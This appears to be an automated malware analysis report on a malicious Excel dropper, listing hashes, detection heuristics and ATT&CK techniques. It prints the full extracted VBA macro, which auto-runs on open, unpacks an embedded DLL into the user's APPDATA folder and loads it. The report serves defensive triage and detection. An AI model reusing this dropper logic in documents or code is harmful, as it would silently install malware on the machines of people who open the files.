Office (OLE) malware analysis — malicious · 7617a094610a7966

MALICIOUS

Office (OLE)

282.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2019-12-10

MD5: 26e21f1c6f4205e8afef4bac3c4f12d6 SHA-1: 97bde7e69c5643185e7c3a742956418e7276fe5b SHA-256: 7617a094610a79666b922a4ff2b743982e043b45d401004c9caada921554be49

396 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

The sample is an Excel file containing a Workbook_Open VBA macro that triggers the execution of an embedded PE executable. This is a common pattern for malware droppers, where the initial document serves to download and run a secondary malicious payload. The presence of the embedded PE file and the Workbook_Open macro strongly indicate a malicious intent to execute arbitrary code.

Heuristics 11

ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
UserForm2.TextBox1.Tag = Environ("TEMP")
UserForm2.TextBox2.Tag = Environ("APPDATA")
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE

Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6849 bytes
SHA-256: `6ebeceffad03ae9d2b9714936879e896034638384a32d690605fff4f322d04a2`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wbO" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" UserForm2.TextBox1.Tag = Environ("TEMP") UserForm2.TextBox2.Tag = Environ("APPDATA") ChDir (Environ("TEMP")) UserForm1.show ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If Win64 Then Public Declare PtrSafe Function Hadno Lib _ "map_studio2.dll" () As Integer Public Declare PtrSafe Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long #Else Public Declare Function Hadno2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long Public Declare Function Hadno Lib _ "map_studio1.dll" () As Integer #End If Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{B2FFBE61-C674-45D8-B8F4-5C911BB5BF02}{65C247F9-FE08-400A-B651-0E56329F5A05}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() DoEvents ReplaceCurrentModule End Sub Private Sub UserForm_Initialize() Call SystemButtonSettings(Me, False) End Sub Attribute VB_Name = "Module2" Private Const GWL_STYLE = -16 Private Const WS_CAPTION = &HC00000 Private Const WS_SYSMENU = &H80000 #If VBA7 Then Private Declare PtrSafe Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long) As Long Private Declare PtrSafe Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" (ByVal hWnd As Long, _ ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare PtrSafe Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare PtrSafe Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #Else Private Declare Function GetWindowLong _ Lib "user32" Alias "GetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long) As Long Private Declare Function SetWindowLong _ Lib "user32" Alias "SetWindowLongA" ( _ ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long Private Declare Function FindWindowA _ Lib "user32" (ByVal lpClassName As String, _ ByVal lpWindowName As String) As Long Private Declare Function DrawMenuBar _ Lib "user32" (ByVal hWnd As Long) As Long #End If Public Sub SystemButtonSettings(frm As Object, show As Boolean) Dim windowStyle As Long Dim windowHandle As Long windowHandle = FindWindowA(vbNullString, frm.Caption) windowStyle = GetWindowLong(windowHandle, GWL_STYLE) If show = False Then SetWindowLong windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU) Else SetWindowLong windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU) End If DrawMenuBar (windowHandle) End Sub Public Sub KillArray(ParamArray PathList() As Variant) On Error Resume Next For Each Key In PathList Kill Key Next Key On Error GoTo 0 End Sub Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer) Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte Dim DataArray() As Long ReDim DataArray(1 To fl) DataArray(1) = CByte(50 + 27) DataArray(2) = CByte(50 + 40) DataArray(3) = CByte(50 + 94) intFileNum = FreeFile Open s For Binary Access Read As intFileNum Dim cur As Integer cur = 1 Do While Not EOF(intFileNum) Get intFileNum, , bytTemp1 If bytTemp1 = DataArray(1) Then Get intFileNum, , bytTemp2 If bytTemp2 = DataArray(2) Then Get intFileNum, , bytTemp3 If bytTemp3 = DataArray(3) Then If cur = num Then For k = 4 To fl Get intFileNum, , bytTemp1 DataArray(k) = bytTemp1 Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close intFileNum intFileNum = FreeFile Open nm For Binary Lock Read Write As #intFileNum For i = LBound(DataArray) To UBound(DataArray) Put #intFileNum, , CByte(DataArray(i)) Next i Close #intFileNum End Sub Attribute VB_Name = "Module3" Public Sub ReplaceCurrentModule() TempName = UserForm2.TextBox1.Tag & "\factory.xlsx" ZipName = TempName + ".zip" ZipFolder = UserForm2.TextBox1.Tag '& "\UnzTmp" Dim nm As String Dim size As Long Dim num As Integer #If Win64 Then nm = UserForm2.TextBox2.Tag + "\map_studio2.dll" size = 68608 num = 2 #Else nm = UserForm2.TextBox2.Tag + "\map_studio1.dll" size = 81920 num = 1 #End If KillArray ZipFolder & "\oleObj" + "ect*.bin", ZipName, nm DoEvents ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False ActiveWorkbook.SaveAs TempName, FileFormat:=51 DoEvents ActiveWorkbook.Close DoEvents FileCopy TempName, ZipName Set oApp = CreateObject("Shell.Application") oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin") Resoration ZipFolder + "\oleObject1.bin", nm, size, num ChDir (UserForm2.TextBox2.Tag) No_Hadno = Hadno2(nm) Hadno End Sub Attribute VB_Name = "UserForm2" Attribute VB_Base = "0{0D19F5AF-25D4-4195-AAB1-AD454CC01A3D}{2FA243B8-1210-4CFA-BB83-21E6E3967921}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False
`embedded_office_000032de.exe`	embedded-pe	Office MZ+PE at offset 0x32DE	275746 bytes
SHA-256: `68de02c7e9f3cdfbd1c71f51dfdf7c2e1d5693ce6347821df4ff9e149e56d186`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD00C8DBB6/Ole10Native	159758 bytes
SHA-256: `4c293793d45e03e7cee05eecc2dfd0a3080066963da3208621e25909a03e3318`

Open this report in the interactive analyzer, or submit your own file for analysis.